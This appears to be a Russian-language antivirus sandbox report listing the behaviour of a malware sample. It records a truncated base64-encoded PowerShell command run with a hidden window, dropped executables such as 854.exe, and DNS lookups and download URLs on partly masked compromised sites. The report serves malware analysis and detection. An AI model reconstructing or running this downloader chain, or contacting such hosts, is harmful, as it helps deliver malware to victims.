Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABxADAAMgA2ADMAMgA9ACcAegAyADMAMwAxADAAMQA1ACcAOwAkAGwAMwA1ADQANAA3ADMAIAA9ACAAJwA4ADUANAAnADsAJABYAF8AOQA3ADQAOQAyADMAPQAnAEkANwAwADEANAA2ACcAOwAkAFUAMAA5ADgANQA2AD0AJABlAG4AdgA6AHUAcwB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1544
- %TEMP%\1166325.cvr
- %HOMEPATH%\854.exe
- %HOMEPATH%\854.exe
- 'po#####evolution.com':80
- 'ma#####tivesolution.com':80
- http://po#####evolution.com/wp-includes/qvsiVSAN/
- http://po#####evolution.com/cgi-sys/suspendedpage.cgi
- http://ma#####tivesolution.com/wp-content/XowIAeQnZg/
- http://www.ma#####tivesolution.com/wp-content/XowIAeQnZg/
- DNS ASK po#####evolution.com
- DNS ASK ma#####tivesolution.com
- DNS ASK oz#####triyelservis.com
- DNS ASK ph#####uylinhchi.com
- DNS ASK ve#####darshkulam.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABxADAAMgA2ADMAMgA9ACcAegAyADMAMwAxADAAMQA1ACcAOwAkAGwAMwA1ADQANAA3ADMAIAA9ACAAJwA4ADUANAAnADsAJABYAF8AOQA3ADQAOQAyADMAPQAnAEkANwAwADEANAA2ACcAOwAkAFUAMAA5ADgANQA2AD0AJABlAG4AdgA6AHUAcwB...' (со скрытым окном)